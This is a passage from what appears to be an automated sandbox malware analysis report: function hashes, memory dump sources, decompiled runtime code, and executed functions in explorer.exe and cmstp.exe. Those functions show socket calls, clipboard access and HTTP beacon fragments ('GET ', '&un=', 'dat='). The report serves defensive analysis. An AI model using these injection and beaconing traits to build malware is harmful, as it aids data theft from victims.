                                                                          • Opcode ID: 90786801ba4ff2d67a89b7cb8ad17a1a4c0902ebdee7420cc967c09f1740c1ec
                                                                          • Instruction ID: 0228207d181fc8b9469af1b6562e4a2e7ccbba1423605b1752f2a4efe0042154
                                                                          • Opcode Fuzzy Hash: 90786801ba4ff2d67a89b7cb8ad17a1a4c0902ebdee7420cc967c09f1740c1ec
                                                                          • Instruction Fuzzy Hash: BED0233174D14646C2115E38EC950D4FB65CDD3130B741BBED8C457210C393C02AC384
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A698A0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 38cad53cddf58bc345d2cc9b7434b41b951d870f1c58a4046e59583b48215d72
                                                                          • Instruction ID: 9373538f0912e053569de5a9a7bfd49dd44f20a41d837298c1968252c3882278
                                                                          • Opcode Fuzzy Hash: 38cad53cddf58bc345d2cc9b7434b41b951d870f1c58a4046e59583b48215d72
                                                                          • Instruction Fuzzy Hash: 1A90026130100402E203616948146060019DBD1385F91C022E1455555D86658953F172
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A69820, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 194c3ae5bd7dac777acd475360fae4fbb0916e6c33b35629ff9270cd24a4faed
                                                                          • Instruction ID: 6bcc67c6100570530744f9a88b42dd784897433dbb6b9e8ea579e81d4ec268a8
                                                                          • Opcode Fuzzy Hash: 194c3ae5bd7dac777acd475360fae4fbb0916e6c33b35629ff9270cd24a4faed
                                                                          • Instruction Fuzzy Hash: AE90027124100402E242716948046060019ABD0381F91C022A0455554E86958A56FAA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A6B040, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c5e6a977f498344bb87201769f4d62c527f70449d11f1ee48778b241e566f41f
                                                                          • Instruction ID: 05adc3e39763556b9266b3ae213cd2270522dab8cb6f541cf2329619174e2840
                                                                          • Opcode Fuzzy Hash: c5e6a977f498344bb87201769f4d62c527f70449d11f1ee48778b241e566f41f
                                                                          • Instruction Fuzzy Hash: 8D9002A1601140435641B1694C044065025ABE1341391C131A0485560C86A88855E2A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A695F0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4f56c0be010bc95d6282b44ddce5e6e04dab61731e7df7221e858a94ca7a38f4
                                                                          • Instruction ID: 2854e7c54e42e7b8497f06ddd63eba44244f70866b6e1268fbb873bfbdfd9388
                                                                          • Opcode Fuzzy Hash: 4f56c0be010bc95d6282b44ddce5e6e04dab61731e7df7221e858a94ca7a38f4
                                                                          • Instruction Fuzzy Hash: 2D90027120100802E20561694C0468600159BD0341F51C021A6055655E96A58891B171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A699D0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2be3a5642636af148c770eaeb5fd974aab49da54354ad5373f622103be868cf0
                                                                          • Instruction ID: 8cf160eb58acd16872b7cd322bfc8a2bccb57c3d1f81f73fddf6cad89d57df64
                                                                          • Opcode Fuzzy Hash: 2be3a5642636af148c770eaeb5fd974aab49da54354ad5373f622103be868cf0
                                                                          • Instruction Fuzzy Hash: 839002A121100042E2056169480470600559BE1341F51C022A2185554CC5698C61A165
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A69520, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3b74f698527267375ec73efc84150e8ae4b1154155d0f6d0b31a14f42b494f8f
                                                                          • Instruction ID: 0e6765a25468c69b2624b40f8f06144e64d4346cad136b04e345330c0ab46e0f
                                                                          • Opcode Fuzzy Hash: 3b74f698527267375ec73efc84150e8ae4b1154155d0f6d0b31a14f42b494f8f
                                                                          • Instruction Fuzzy Hash: BF9002E1201140925601A2698804B0A45159BE0341B51C026E1085560CC5658851E175
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A6AD30, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 97fd76760b589c5f9af3d59b723d765afe70b24c2aa35221e295f67b1009e333
                                                                          • Instruction ID: 334631062774b9612c65657e267ef719efd856e49e018b8a83bb731c441f91a8
                                                                          • Opcode Fuzzy Hash: 97fd76760b589c5f9af3d59b723d765afe70b24c2aa35221e295f67b1009e333
                                                                          • Instruction Fuzzy Hash: BA900271A0500012A24171694C146464016ABE0781B55C021A0545554C89948A55A3E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A69560, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b8b5435ada3328d16d1b9a5434931e6279f52075b70c5bd4aa51c7af509e8b33
                                                                          • Instruction ID: e2561301e82270e67f6abec70d7f891f8dfa85b83f608a3ed377ae451cc9517c
                                                                          • Opcode Fuzzy Hash: b8b5435ada3328d16d1b9a5434931e6279f52075b70c5bd4aa51c7af509e8b33
                                                                          • Instruction Fuzzy Hash: 09900265221000021246A5690A0450B0455ABD6391391C025F1447590CC6618865A361
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A69950, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6bf6ecb4100357e95dcea5ff51e77d441c5f7872d1582408b1709ef2b258c707
                                                                          • Instruction ID: f0e9916b11c35644c7ff33a5f9cbdaf9db430dbc3135651b78fdcc56bb9d2fdc
                                                                          • Opcode Fuzzy Hash: 6bf6ecb4100357e95dcea5ff51e77d441c5f7872d1582408b1709ef2b258c707
                                                                          • Instruction Fuzzy Hash: 529002A120140403E24165694C0460700159BD0342F51C021A2095555E8A698C51B175
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A69A80, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b002d1be0b320e8bc8891f5bd26f428bb5cf750ada733535b46145a8437b1078
                                                                          • Instruction ID: 8a0ad661e1d4370dcf97201568f7d010040891645d18cc8acd15e8649745bbfb
                                                                          • Opcode Fuzzy Hash: b002d1be0b320e8bc8891f5bd26f428bb5cf750ada733535b46145a8437b1078
                                                                          • Instruction Fuzzy Hash: 1D90026120144442E24162694C04B0F41159BE1342F91C029A4187554CC9558855A761
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A696D0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 810c3a25465355c04138bae782ba375760098f65d96c52e92e1e63872b671f87
                                                                          • Instruction ID: 773d2778dc8467259886de77418e663aad584267f8fb983b22409e47d37edf84
                                                                          • Opcode Fuzzy Hash: 810c3a25465355c04138bae782ba375760098f65d96c52e92e1e63872b671f87
                                                                          • Instruction Fuzzy Hash: 0690027120100842E20161694804B4600159BE0341F51C026A0155654D8655C851B561
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A69A10, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3fa71ecf1f1d9c445151304aed3833e8e0265e9d75c32a3bc39244623d90f921
                                                                          • Instruction ID: d5a1d3ebeee01ced9308c6041c451e26fa86e1cdd3a65233bfa8e33e22efa185
                                                                          • Opcode Fuzzy Hash: 3fa71ecf1f1d9c445151304aed3833e8e0265e9d75c32a3bc39244623d90f921
                                                                          • Instruction Fuzzy Hash: 1690027120140402E20161694C0874700159BD0342F51C021A5195555E86A5C891B571
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A69610, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: caf8fd9bfc5f7df02c4cbc348dcb7397715572ed23b1e8428ecb5dfdb09c71d4
                                                                          • Instruction ID: 1b18bb7ebf4985a1fe1d89210cd1d63bb8dd790e35b63933ab7dd85c463568f6
                                                                          • Opcode Fuzzy Hash: caf8fd9bfc5f7df02c4cbc348dcb7397715572ed23b1e8428ecb5dfdb09c71d4
                                                                          • Instruction Fuzzy Hash: D390027160500802E2517169481474600159BD0341F51C021A0055654D87958A55B6E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A69650, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 01d5386001e6e9abdca7a4faf25542374d6ebe98afd13fff20b745ebb2d60b18
                                                                          • Instruction ID: 40568eb9cce82f8a2e265eeae2014845f5c5f0812fd232a502a3856d9fd4dd68
                                                                          • Opcode Fuzzy Hash: 01d5386001e6e9abdca7a4faf25542374d6ebe98afd13fff20b745ebb2d60b18
                                                                          • Instruction Fuzzy Hash: 5D90027120504842E24171694804A4600259BD0345F51C021A0095694D96658D55F6A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A6A3B0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 934600b63a928edc3838161f0d932b237cfef2b1849b0bf55ab6eb299f6c9f95
                                                                          • Instruction ID: 1c07e685b9248a0ca8a7d71b81ece0834df6166bc52db77a44b00bf2bdfd8199
                                                                          • Opcode Fuzzy Hash: 934600b63a928edc3838161f0d932b237cfef2b1849b0bf55ab6eb299f6c9f95
                                                                          • Instruction Fuzzy Hash: 6090027120144002E2417169884460B5015ABE0341F51C421E0456554C86558856E261
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A69B00, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0542ec7ce29515950caf7977e33ec63c448f4fcbebadb1299ce634f3ddf849b3
                                                                          • Instruction ID: 3db7a2a55a6b87fb06e794265a6d8faf5c2438b8ab3358b636f0af39e05e9e34
                                                                          • Opcode Fuzzy Hash: 0542ec7ce29515950caf7977e33ec63c448f4fcbebadb1299ce634f3ddf849b3
                                                                          • Instruction Fuzzy Hash: F290026124100802E241716988147070016DBD0741F51C021A0055554D86568965B6F1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A69670, Relevance: .0, Instructions: 2COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction ID: dce6f95e1f134ab0a79cdc3f723e5afd6aecce0543b1d29046b612bf1790e284
                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00ABFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 53%
                                                                          			E00ABFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00A6CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00AB5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00AB5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                          0x00abfdda
                                                                          0x00abfde2
                                                                          0x00abfde5
                                                                          0x00abfdec
                                                                          0x00abfdfa
                                                                          0x00abfdff
                                                                          0x00abfe0a
                                                                          0x00abfe0f
                                                                          0x00abfe17
                                                                          0x00abfe1e
                                                                          0x00abfe19
                                                                          0x00abfe19
                                                                          0x00abfe19
                                                                          0x00abfe20
                                                                          0x00abfe21
                                                                          0x00abfe22
                                                                          0x00abfe25
                                                                          0x00abfe40

                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ABFDFA
                                                                          Strings
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00ABFE01
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00ABFE2B
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                          • API String ID: 885266447-3903918235
                                                                          • Opcode ID: 6f7e0163ec828fbed7ec1a8b1815ef5265984d09e575b4d53260352fd1fbc5b9
                                                                          • Instruction ID: 4c6026f4567993a0dca8f7e8eea1f2696076978149833d754e41f9757770f907
                                                                          • Opcode Fuzzy Hash: 6f7e0163ec828fbed7ec1a8b1815ef5265984d09e575b4d53260352fd1fbc5b9
                                                                          • Instruction Fuzzy Hash: 20F0C236604601BFDA211A55DD02FB3BB6EEB45730F240614F628565E2DA62F87097E4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Analysis Process: explorer.exe PID: 3388 Parent PID: 3664 explorer.exeCOMMON

                                                                          Executed Functions

                                                                          Function 06416302, Relevance: 23.7, APIs: 3, Strings: 10, Instructions: 911networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.489150502.0000000006400000.00000040.00000001.sdmp, Offset: 06400000, based on PE: false
                                                                          Similarity
                                                                          • API ID: getaddrinforecvsetsockopt
                                                                          • String ID: Co$&br=$&un=$: cl$=$GET $dat=$nnec$ose$tion
                                                                          • API String ID: 1564272048-2976227712
                                                                          • Opcode ID: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
                                                                          • Instruction ID: e37e97e53cd11004862840258850e6eda6b2dc7f132b9986e8d6e26fca3ef8f6
                                                                          • Opcode Fuzzy Hash: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
                                                                          • Instruction Fuzzy Hash: 0C626170618B088FD7A9EF68D4947EAB7E1FB94300F50492ED49BCB246EF30A546CB45
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06412EFE, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.489150502.0000000006400000.00000040.00000001.sdmp, Offset: 06400000, based on PE: false
                                                                          Similarity
                                                                          • API ID: closesocket
                                                                          • String ID: clos$esoc$ket
                                                                          • API String ID: 2781271927-3604069445
                                                                          • Opcode ID: debb1de1ae8bd1935cf3204c4e922018d3bc3bd1fa25b861d450e182fb477b51
                                                                          • Instruction ID: 100a5ceb6f07c3d029ba1e71f0b1ca4566b68d1e24da99606b8e94acd648fe91
                                                                          • Opcode Fuzzy Hash: debb1de1ae8bd1935cf3204c4e922018d3bc3bd1fa25b861d450e182fb477b51
                                                                          • Instruction Fuzzy Hash: 03F0907021CB089FCBC4DF1894887E9B7E1FB89314F54056EE48DCB204CB7885428787
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06412F02, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.489150502.0000000006400000.00000040.00000001.sdmp, Offset: 06400000, based on PE: false
                                                                          Similarity
                                                                          • API ID: closesocket
                                                                          • String ID: clos$esoc$ket
                                                                          • API String ID: 2781271927-3604069445
                                                                          • Opcode ID: 38f943f3a1bf856e04ab8ffe01a156dfd9c5375a96730fcfdde4480564b18170
                                                                          • Instruction ID: fdfd021ea58704e6798976ad7846e2cb3e4d3543d05586f08b74c82b2ac9d3d6
                                                                          • Opcode Fuzzy Hash: 38f943f3a1bf856e04ab8ffe01a156dfd9c5375a96730fcfdde4480564b18170
                                                                          • Instruction Fuzzy Hash: BBF01D70618B089FCBC4DF18D4C479AB7E1FB89314F54556DA45DCB244CB7485468786
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06412E7E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.489150502.0000000006400000.00000040.00000001.sdmp, Offset: 06400000, based on PE: false
                                                                          Similarity
                                                                          • API ID: connect
                                                                          • String ID: conn$ect
                                                                          • API String ID: 1959786783-716201944
                                                                          • Opcode ID: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
                                                                          • Instruction ID: 3dbc18662f91771aff42964a8e3602da2c136c5823fbb32ae5e7028f554f0310
                                                                          • Opcode Fuzzy Hash: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
                                                                          • Instruction Fuzzy Hash: 83017170618A088FDBC4EF1CE088B15BBE0EB58314F1545AFE80DCB227CBB0C8818B81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06412E82, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.489150502.0000000006400000.00000040.00000001.sdmp, Offset: 06400000, based on PE: false
                                                                          Similarity
                                                                          • API ID: connect
                                                                          • String ID: conn$ect
                                                                          • API String ID: 1959786783-716201944
                                                                          • Opcode ID: 26898fd5f90645f94afd46a3ac35e2686c27f416d54a17c3d9a13a012a848fc3
                                                                          • Instruction ID: f4d5e33b36050ea4a6c0fa55e00c737368d10d15f60a301f414b0237f6e873cd
                                                                          • Opcode Fuzzy Hash: 26898fd5f90645f94afd46a3ac35e2686c27f416d54a17c3d9a13a012a848fc3
                                                                          • Instruction Fuzzy Hash: 22012C70618A088FDBC8EF5CE488B15B7E0EB58314F1541AFA80DCB226CAB0C9818B81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06412DF7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.489150502.0000000006400000.00000040.00000001.sdmp, Offset: 06400000, based on PE: false
                                                                          Similarity
                                                                          • API ID: send
                                                                          • String ID: send
                                                                          • API String ID: 2809346765-2809346765
                                                                          • Opcode ID: 06a0e18ca9c1e1e84b1de7ba9482a901a96b4c92f796fb4ce4398a9b5ac61c15
                                                                          • Instruction ID: 3589a728fd35b2e635599da46edfc175e3de06e1b547662c1413a72a95ec4c4e
                                                                          • Opcode Fuzzy Hash: 06a0e18ca9c1e1e84b1de7ba9482a901a96b4c92f796fb4ce4398a9b5ac61c15
                                                                          • Instruction Fuzzy Hash: 54012170918A088FCBC4EF5CA089B1577E0EB9C324F1545AE984DCB266CB70D982CB82
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06412E02, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.489150502.0000000006400000.00000040.00000001.sdmp, Offset: 06400000, based on PE: false
                                                                          Similarity
                                                                          • API ID: send
                                                                          • String ID: send
                                                                          • API String ID: 2809346765-2809346765
                                                                          • Opcode ID: 3773d62206420a3ed138edb7b0d1187259b6e4662953c22d04494397483c12ef
                                                                          • Instruction ID: a0e1afeb7548ee598ac9b27d3868b01a50a7487bafce48f9f1f6c3b999481cf8
                                                                          • Opcode Fuzzy Hash: 3773d62206420a3ed138edb7b0d1187259b6e4662953c22d04494397483c12ef
                                                                          • Instruction Fuzzy Hash: CD010C70618B088FDBC8EF1CA488B15B7E0EB9C324F1545AE984DCB266CB70D981CB81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06412D02, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.489150502.0000000006400000.00000040.00000001.sdmp, Offset: 06400000, based on PE: false
                                                                          Similarity
                                                                          • API ID: socket
                                                                          • String ID: sock
                                                                          • API String ID: 98920635-2415254727
                                                                          • Opcode ID: 324350153747078c09b6e059cc1e16611ed0418a95caa11cf7f7e91404692acf
                                                                          • Instruction ID: c7d0e4641a8a0fbb25e55052cd2f9962a7ff2906bb2f35b89f09ba620f86c6ae
                                                                          • Opcode Fuzzy Hash: 324350153747078c09b6e059cc1e16611ed0418a95caa11cf7f7e91404692acf
                                                                          • Instruction Fuzzy Hash: 70012C70658A188FDB84EF1CE048B15BBE0FB98314F1541AEE84DCB366D7B0C9418B86
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0640E272, Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.489150502.0000000006400000.00000040.00000001.sdmp, Offset: 06400000, based on PE: false
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: fd57b9079238b9e4bf1c504420f21d1e9a897069bc43c21d39ffc44af76478d5
                                                                          • Instruction ID: 6d0807ba6bd5d818e45adfbc77e8a22db0f5dcb823d6bedd92ed90ae23b12b25
                                                                          • Opcode Fuzzy Hash: fd57b9079238b9e4bf1c504420f21d1e9a897069bc43c21d39ffc44af76478d5
                                                                          • Instruction Fuzzy Hash: 4C217730614B5D8FEBD9EF5984D42AAB7A1FB94300F480A7FC91DCB296CB309451CB51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0640FEAA, Relevance: 1.6, APIs: 1, Instructions: 64clipboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.489150502.0000000006400000.00000040.00000001.sdmp, Offset: 06400000, based on PE: false
                                                                          Similarity
                                                                          • API ID: ClipboardOpen
                                                                          • String ID:
                                                                          • API String ID: 2793039342-0
                                                                          • Opcode ID: 0a81b9c5098993d40a50e0f995296f7c58cd9fe7fb6d482d8f883cb673d857ef
                                                                          • Instruction ID: 33ad1c85bbf2a28d2a221af3f5d4972c9e4863bb5bf73a3d13c88a045a557424
                                                                          • Opcode Fuzzy Hash: 0a81b9c5098993d40a50e0f995296f7c58cd9fe7fb6d482d8f883cb673d857ef
                                                                          • Instruction Fuzzy Hash: EF114230510D194FEBE6E728845C7A62195FB49306F5854BA980DCA2C2DB75D5CACB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0640FEB2, Relevance: 1.6, APIs: 1, Instructions: 63clipboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.489150502.0000000006400000.00000040.00000001.sdmp, Offset: 06400000, based on PE: false
                                                                          Similarity
                                                                          • API ID: ClipboardOpen
                                                                          • String ID:
                                                                          • API String ID: 2793039342-0
                                                                          • Opcode ID: c435c781f8fbf6caabe55a16d7c60c026a95aedc4a66d9b66e8dd31f9fb2c40d
                                                                          • Instruction ID: 2d2cb2e9c000ba7fba2341387b9416bf6b43140321d2fa4a0deeef725a9ebb00
                                                                          • Opcode Fuzzy Hash: c435c781f8fbf6caabe55a16d7c60c026a95aedc4a66d9b66e8dd31f9fb2c40d
                                                                          • Instruction Fuzzy Hash: 8B115E30610D198BEBE6FB28889C3B72196FB49306F5814BA9C0DCA2C1DB75D5CACB40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Analysis Process: cmstp.exe PID: 5796 Parent PID: 3388 cmstp.exeCOMMON

                                                                          Executed Functions

                                                                          Function 028581B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02853B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02853B87,007A002E,00000000,00000060,00000000,00000000), ref: 028581FD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
